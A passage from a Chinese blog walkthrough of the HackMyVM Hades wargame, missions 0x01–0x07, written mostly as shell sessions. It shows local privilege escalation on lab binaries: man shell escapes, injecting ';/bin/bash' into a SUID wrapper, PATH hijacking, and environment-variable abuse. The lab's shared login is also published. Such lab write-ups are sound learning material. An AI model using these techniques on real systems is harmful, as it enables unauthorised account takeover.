<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ghostlitao.gitee.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="MISSION 0x0112345678910111213141516171819202122232425262728# Host: hades.hackmyvm.eu# Port: 6666# User: hacker# Pass: begood!ssh hacker@hades.hackmyvm.eu -p 6666cat readme.txtcat mission.txt# User aca">
<meta property="og:type" content="article">
<meta property="og:title" content="HMVLabs Chapter 2: Hades">
<meta property="og:url" content="https://ghostlitao.gitee.io/2024/02/08/hmv-HMVLabs-Chapter-2-Hades/index.html">
<meta property="og:site_name" content="去找Todd">
<meta property="og:description" content="MISSION 0x0112345678910111213141516171819202122232425262728# Host: hades.hackmyvm.eu# Port: 6666# User: hacker# Pass: begood!ssh hacker@hades.hackmyvm.eu -p 6666cat readme.txtcat mission.txt# User aca">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-02-08T05:36:59.000Z">
<meta property="article:modified_time" content="2024-04-09T00:35:39.994Z">
<meta property="article:author" content="Todd">
<meta property="article:tag" content="安全 靶机">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://ghostlitao.gitee.io/2024/02/08/hmv-HMVLabs-Chapter-2-Hades/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>HMVLabs Chapter 2: Hades | 去找Todd</title>
  


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?d988341c748563d16048e8e7dab0f384";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">去找Todd</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Todd的博客</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/02/08/hmv-HMVLabs-Chapter-2-Hades/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          HMVLabs Chapter 2: Hades
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-08 13:36:59" itemprop="dateCreated datePublished" datetime="2024-02-08T13:36:59+08:00">2024-02-08</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:35:39" itemprop="dateModified" datetime="2024-04-09T08:35:39+08:00">2024-04-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="MISSION-0x01"><a href="#MISSION-0x01" class="headerlink" title="MISSION 0x01"></a>MISSION 0x01</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Host: hades.hackmyvm.eu</span></span><br><span class="line"><span class="comment"># Port: 6666</span></span><br><span class="line"><span class="comment"># User: hacker</span></span><br><span class="line"><span class="comment"># Pass: begood!</span></span><br><span class="line"></span><br><span class="line">ssh hacker@hades.hackmyvm.eu -p 6666</span><br><span class="line"><span class="built_in">cat</span> readme.txt</span><br><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># User acantha has left us a gift to obtain her powers.</span></span><br><span class="line"><span class="comment"># 找一下gift</span></span><br><span class="line">find / -name *gift* 2&gt;/dev/null</span><br><span class="line"><span class="comment"># 找到 /opt/gift_hacker</span></span><br><span class="line">file /opt/gift_hacker</span><br><span class="line"><span class="comment"># -bash: file: command not found</span></span><br><span class="line"><span class="comment"># 竟然没有file命令</span></span><br><span class="line"><span class="comment"># 试试strings</span></span><br><span class="line">strings /opt/gift_hacker</span><br><span class="line"><span class="comment"># 看起来是一个二进制文件，应该需要执行</span></span><br><span class="line"><span class="comment"># 执行之后竟然是一个shell</span></span><br><span class="line"><span class="comment"># bash: you: command not found</span></span><br><span class="line"><span class="comment"># acantha@hades:~$</span></span><br><span class="line"><span class="built_in">id</span></span><br><span class="line"><span class="comment"># uid=2043(acantha) gid=2001(hacker) groups=2001(hacker)</span></span><br><span class="line"><span class="comment"># 之前是 uid=2001(hacker) gid=2001(hacker) groups=2001(hacker)</span></span><br><span class="line"><span class="built_in">ls</span> -al /pwned/acantha</span><br><span class="line"><span class="comment"># 没权限，先逆向下刚才的  /opt/gift_hacker 文件</span></span><br><span class="line">scp -P 6666 hacker@hades.hackmyvm.eu:/opt/gift_hacker .</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<span id="more"></span>
<p>到本地 cutter 打开：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">undefined8 <span class="title function_">main</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">int64_t</span> var_28h;</span><br><span class="line">    <span class="type">int64_t</span> var_20h;</span><br><span class="line">    </span><br><span class="line">    setuid(<span class="number">0x7fb</span>);</span><br><span class="line">    setgid(<span class="number">0x7fb</span>);</span><br><span class="line">    system(<span class="string">&quot;/bin/bash&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>就是设置了uid和gid，然后执行了&#x2F;bin&#x2F;bash，还有一个点刚才执行的时候，提示了bash: you: command not found，看下 hacker 下的 .bashrc<br>发现第一行是：<br><code>you must keep attention for the permission in all the files........</code><br>所以报错。这个不知道是故意还是无意。不管了，既然提醒我权限的问题，那我去找找这个用户的文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">find / -user acantha 2&gt;/dev/null</span><br><span class="line"><span class="comment"># 看到了一个文件：/pazz/acantha_pass.txt</span></span><br><span class="line"><span class="built_in">cat</span> /pazz/acantha_pass.txt</span><br><span class="line"><span class="comment"># 得到密码</span></span><br><span class="line">su - acantha</span><br><span class="line"><span class="comment"># su 竟然也没权限，那 ssh 试试</span></span><br><span class="line">ssh acantha@127.0.0.1 </span><br><span class="line"><span class="comment"># 成功进入</span></span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x02"><a href="#MISSION-0x02" class="headerlink" title="MISSION 0x02"></a>MISSION 0x02</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># The user alala has left us a program, if we insert the 6 correct numbers, she gives us her password!</span></span><br><span class="line"><span class="comment"># 程序就在目录下，叫 guess ,直接执行</span></span><br><span class="line">./guess</span><br><span class="line"><span class="comment"># 输入6个数字，提示错误，先 strings 看看有没有写死，</span></span><br><span class="line"><span class="comment"># 看到一个类似密码的字符串，试试</span></span><br><span class="line">ssh alala@127.0.0.1 </span><br><span class="line"><span class="comment"># 竟然对了。不用逆向了。</span></span><br></pre></td></tr></table></figure>


<h1 id="MISSION-0x03"><a href="#MISSION-0x03" class="headerlink" title="MISSION 0x03"></a>MISSION 0x03</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># User althea loves reading Linux help.</span></span><br><span class="line"><span class="built_in">ls</span> -al</span><br><span class="line"><span class="comment"># 目录有 read 文件，执行之后 发现就是 man，还有 althea_pass.txt ，没权限看。 </span></span><br><span class="line"><span class="comment"># man 的话，就是man 的提权，查了下 用 !/bin/sh 就可以了</span></span><br><span class="line">./read </span><br><span class="line">!/bin/sh</span><br><span class="line"><span class="comment"># /usr/bin/man: can&#x27;t set the locale; make sure $LC_* and $LANG are correct</span></span><br><span class="line"><span class="comment"># /bin/bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)</span></span><br><span class="line"><span class="comment"># /bin/sh: 1: Syntax error: &quot;(&quot; unexpected</span></span><br><span class="line"><span class="comment">#!done  (press RETURN)</span></span><br><span class="line"><span class="comment"># 提示语法错误，看起来是 LC_ALL 的问题，试试</span></span><br><span class="line"><span class="built_in">export</span> LC_ALL=C</span><br><span class="line">./read</span><br><span class="line">!/bin/sh</span><br><span class="line"><span class="comment"># 一样的错，看来。。。不是这个问题。既然不能 !/bin/sh 那么直接读 password 可以吗</span></span><br><span class="line">./read</span><br><span class="line">!<span class="built_in">cat</span> althea_pass.txt</span><br><span class="line"><span class="comment"># 成功</span></span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x04"><a href="#MISSION-0x04" class="headerlink" title="MISSION 0x04"></a>MISSION 0x04</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># The user andromeda has left us a program to list directories</span></span><br><span class="line"><span class="built_in">ls</span> -al</span><br><span class="line">althea@hades:~$ <span class="built_in">ls</span> -al</span><br><span class="line">total 56</span><br><span class="line">drwxr-x--- 1 root      althea     4096 Jan 31 19:46 .</span><br><span class="line">drwxr-xr-x 1 root      root       4096 Jul 26  2023 ..</span><br><span class="line">-rw-r--r-- 1 althea    althea      220 Apr 23  2023 .bash_logout</span><br><span class="line">-rw-r--r-- 1 althea    althea     3526 Apr 23  2023 .bashrc</span><br><span class="line">-rw-r--r-- 1 althea    althea      807 Apr 23  2023 .profile</span><br><span class="line">-r--r----- 1 andromeda andromeda    21 Jan 31 19:46 andromeda_pass.txt</span><br><span class="line">-rw-r----- 1 root      althea       22 Jul 26  2023 flagz.txt</span><br><span class="line">-rwS--s--- 1 root      althea    16216 Jul 26  2023 lsme</span><br><span class="line">-rw-r----- 1 root      althea      205 Jul 26  2023 mission.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># 同样 andromeda_pass.txt 没权限看，执行 lsme</span></span><br><span class="line"></span><br><span class="line">./lsme</span><br><span class="line">Enter file to check:</span><br><span class="line">.</span><br><span class="line">total 28</span><br><span class="line">-r--r----- 1 andromeda andromeda    21 Jan 31 19:46 andromeda_pass.txt</span><br><span class="line">-rw-r----- 1 root      althea       22 Jul 26  2023 flagz.txt</span><br><span class="line">-rwS--s--- 1 root      althea    16216 Jul 26  2023 lsme</span><br><span class="line">-rw-r----- 1 root      althea      205 Jul 26  2023 mission.txt</span><br><span class="line"><span class="comment"># 看起来是帮我们执行了 ls -l </span></span><br><span class="line"></span><br><span class="line">./lsme</span><br><span class="line">Enter file to check:</span><br><span class="line">andromeda_pass.txt</span><br><span class="line">-r--r----- 1 andromeda andromeda 21 Jan 31 19:46 andromeda_pass.txt</span><br><span class="line">Segmentation fault</span><br><span class="line"></span><br><span class="line"><span class="comment"># Segmentation fault 是什么鬼，命令能注入吗？</span></span><br><span class="line">./lsme</span><br><span class="line"></span><br><span class="line">;/bin/bash</span><br><span class="line"><span class="comment"># 成功</span></span><br><span class="line">althea@hades:~$ ./lsme</span><br><span class="line">Enter file to check:</span><br><span class="line">;/bin/bash</span><br><span class="line">total 28</span><br><span class="line">-r--r----- 1 andromeda andromeda    21 Jan 31 19:46 andromeda_pass.txt</span><br><span class="line">-rw-r----- 1 root      althea       22 Jul 26  2023 flagz.txt</span><br><span class="line">-rwS--s--- 1 root      althea    16216 Jul 26  2023 lsme</span><br><span class="line">-rw-r----- 1 root      althea      205 Jul 26  2023 mission.txt</span><br><span class="line">andromeda@hades:~$ <span class="built_in">id</span></span><br><span class="line">uid=2046(andromeda) gid=2045(althea) <span class="built_in">groups</span>=2045(althea)</span><br><span class="line"><span class="built_in">cat</span> andromeda_pass.txt</span><br><span class="line"><span class="comment"># 成功</span></span><br><span class="line">ssh andromeda@127.0.0.1</span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x05"><a href="#MISSION-0x05" class="headerlink" title="MISSION 0x05"></a>MISSION 0x05</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># The user anthea reminds us who we are.</span></span><br><span class="line">andromeda@hades:~$ <span class="built_in">ls</span> -al</span><br><span class="line">total 52</span><br><span class="line">drwxr-x--- 2 root      andromeda  4096 Jul 26  2023 .</span><br><span class="line">drwxr-xr-x 1 root      root       4096 Jul 26  2023 ..</span><br><span class="line">-rw-r--r-- 1 andromeda andromeda   220 Apr 23  2023 .bash_logout</span><br><span class="line">-rw-r--r-- 1 andromeda andromeda  3526 Apr 23  2023 .bashrc</span><br><span class="line">-rw-r--r-- 1 andromeda andromeda   807 Apr 23  2023 .profile</span><br><span class="line">-r--r----- 1 anthea    anthea       21 Jul 26  2023 anthea_pass.txt</span><br><span class="line">-rw-r----- 1 root      andromeda    22 Jul 26  2023 flagz.txt</span><br><span class="line">-rw-r----- 1 root      andromeda   166 Jul 26  2023 mission.txt</span><br><span class="line">-rwS--s--- 1 root      andromeda 16056 Jul 26  2023 uid</span><br><span class="line"><span class="comment"># 有一个 uid 文件，执行看看</span></span><br><span class="line">./uid</span><br><span class="line">uid=2047(anthea) gid=2046(andromeda) <span class="built_in">groups</span>=2046(andromeda)</span><br><span class="line"><span class="comment"># id</span></span><br><span class="line">uid=2046(andromeda) gid=2046(andromeda) <span class="built_in">groups</span>=2046(andromeda)</span><br><span class="line"><span class="comment"># 这些人名，看得我都分不出来了。</span></span><br><span class="line"><span class="built_in">cat</span> anthea_pass.txt</span><br><span class="line"><span class="built_in">cat</span>: anthea_pass.txt: Permission denied</span><br><span class="line"><span class="comment"># 看不见密码，我得利用 uid 来查看这个密码，uid 看起来是使用了 anthea 的身份执行了 id 命令 , 没有参数，命令就不能注入，那么可能就是利用环境变量了。</span></span><br><span class="line"><span class="comment"># 尝试把 /bin/bash 弄到 /var/tmp/id 下</span></span><br><span class="line"><span class="built_in">ln</span> -s /bin/bash /var/tmp/id</span><br><span class="line"><span class="built_in">ln</span>: failed to create symbolic <span class="built_in">link</span> <span class="string">&#x27;/var/tmp/id&#x27;</span>: File exists</span><br><span class="line"><span class="comment"># 看起来已经有其他盆友做过了，先给删了</span></span><br><span class="line"><span class="built_in">rm</span> /var/tmp/id</span><br><span class="line"><span class="built_in">ln</span> -sv /bin/bash /var/tmp/id</span><br><span class="line"><span class="comment"># 修改 PATH 之前先 echo 一下</span></span><br><span class="line"><span class="built_in">echo</span> <span class="variable">$PATH</span></span><br><span class="line">/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games</span><br><span class="line"><span class="comment"># 修改 PATH</span></span><br><span class="line"><span class="built_in">export</span> PATH=/var/tmp:<span class="variable">$PATH</span></span><br><span class="line"><span class="built_in">which</span> <span class="built_in">id</span></span><br><span class="line">/var/tmp/id</span><br><span class="line"><span class="comment"># 可以了 ，执行 uid</span></span><br><span class="line">./uid</span><br><span class="line">sh: 1: <span class="built_in">id</span>: Permission denied</span><br><span class="line"><span class="comment"># 发现没有权限执行，看下/var/tmp 的执行权限</span></span><br><span class="line"><span class="built_in">ls</span> -al /var/</span><br><span class="line">drwxrwxrwt 1 root root  4096 Feb  8 07:12 tmp</span><br><span class="line"><span class="comment"># 没有执行权限，那么就是没有权限执行 /var/tmp/id</span></span><br><span class="line"><span class="comment"># 再看看/tmp</span></span><br><span class="line"><span class="built_in">ls</span> -al /</span><br><span class="line">drwxr-x-wx  62 root root 4140 Feb  8 07:14 tmp</span><br><span class="line"><span class="comment"># 有执行权限，那么就是 /tmp/id 再来一遍，拿到 anthea 的 shell</span></span><br><span class="line"><span class="built_in">cat</span> anthea_pass.txt</span><br><span class="line"><span class="comment"># 成功那到密码</span></span><br><span class="line">ssh anthea@127.0.0.1</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x06"><a href="#MISSION-0x06" class="headerlink" title="MISSION 0x06"></a>MISSION 0x06</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># User aphrodite is obsessed with the number 94.</span></span><br><span class="line"></span><br><span class="line">anthea@hades:~$ <span class="built_in">ls</span>  -al</span><br><span class="line">total 56</span><br><span class="line">drwxr-x--- 1 root      anthea     4096 Jul 26  2023 .</span><br><span class="line">drwxr-xr-x 1 root      root       4096 Jul 26  2023 ..</span><br><span class="line">-rw-r--r-- 1 anthea    anthea      220 Apr 23  2023 .bash_logout</span><br><span class="line">-rw-r--r-- 1 anthea    anthea     3534 Feb  3 15:51 .bashrc</span><br><span class="line">-rw-r--r-- 1 anthea    anthea      807 Apr 23  2023 .profile</span><br><span class="line">-r--r----- 1 aphrodite aphrodite    21 Jul 26  2023 aphrodite_pass.txt</span><br><span class="line">-rw-r----- 1 root      anthea       22 Jul 26  2023 flagz.txt</span><br><span class="line">-rw-r----- 1 root      anthea      175 Jul 26  2023 mission.txt</span><br><span class="line">-rwS--s--- 1 root      anthea    16256 Jul 26  2023 obsessed</span><br><span class="line"></span><br><span class="line"><span class="comment"># 有一个 obsessed 文件，执行看看</span></span><br><span class="line"> ./obsessed</span><br><span class="line">No MYID ENV</span><br><span class="line"></span><br><span class="line"><span class="comment"># 看起来是需要 MYID 环境变量，那么就是注入了，试试</span></span><br><span class="line">MYID=94 ./obsessed</span><br><span class="line">Current MYID: 57</span><br><span class="line">Incorrect MYID</span><br><span class="line"><span class="comment"># 方向是对的，但是MYID被换成了57，那如果是 a 是多少</span></span><br><span class="line">MYID=a ./obsessed</span><br><span class="line">Current MYID: 97</span><br><span class="line">Incorrect MYID</span><br><span class="line"><span class="comment"># a 是 97 的话，想到了 ascii 码，那么 A 就是 65了</span></span><br><span class="line">MYID=A ./obsessed</span><br><span class="line">Current MYID: 65</span><br><span class="line">Incorrect MYID</span><br><span class="line"></span><br><span class="line"><span class="comment"># 果然，那么如果要出现 94，查下 ascii 码表， 94 对应的字符是 ^</span></span><br><span class="line">anthea@hades:~$ MYID=^ ./obsessed</span><br><span class="line">Current MYID: 94</span><br><span class="line">aphrodite@hades:~$</span><br><span class="line"><span class="comment"># 成功</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> aphrodite_pass.txt</span><br><span class="line">ssh aphrodite@127.0.0.1</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x07"><a href="#MISSION-0x07" class="headerlink" title="MISSION 0x07"></a>MISSION 0x07</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># The user ariadne knows what we keep in our HOME.</span></span><br><span class="line"></span><br><span class="line">aphrodite@hades:~$ <span class="built_in">ls</span> -al</span><br><span class="line">total 56</span><br><span class="line">drwxr-x--- 1 root      aphrodite  4096 Jul 26  2023 .</span><br><span class="line">drwxr-xr-x 1 root      root       4096 Jul 26  2023 ..</span><br><span class="line">-rw-r--r-- 1 aphrodite aphrodite   220 Apr 23  2023 .bash_logout</span><br><span class="line">-rw-r--r-- 1 aphrodite aphrodite  3526 Feb  4 16:13 .bashrc</span><br><span class="line">-rw-r--r-- 1 aphrodite aphrodite   807 Apr 23  2023 .profile</span><br><span class="line">-r--r----- 1 ariadne   ariadne      21 Jul 26  2023 ariadne_pass.txt</span><br><span class="line">-rw-r----- 1 root      aphrodite    22 Jul 26  2023 flagz.txt</span><br><span class="line">-rwS--s--- 1 root      aphrodite 16216 Jul 26  2023 homecontent</span><br><span class="line">-rw-r----- 1 root      aphrodite   185 Jul 26  2023 mission.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># 有一个 homecontent 文件，执行看看</span></span><br><span class="line"></span><br><span class="line">aphrodite@hades:~$ ./homecontent</span><br><span class="line">The content of your HOME is:</span><br><span class="line">ariadne_pass.txt  flagz.txt  homecontent  mission.txt</span><br><span class="line"><span class="comment"># 看起来是帮我们执行了 ls, 直接想到的就是 HOME 的环境变量</span></span><br><span 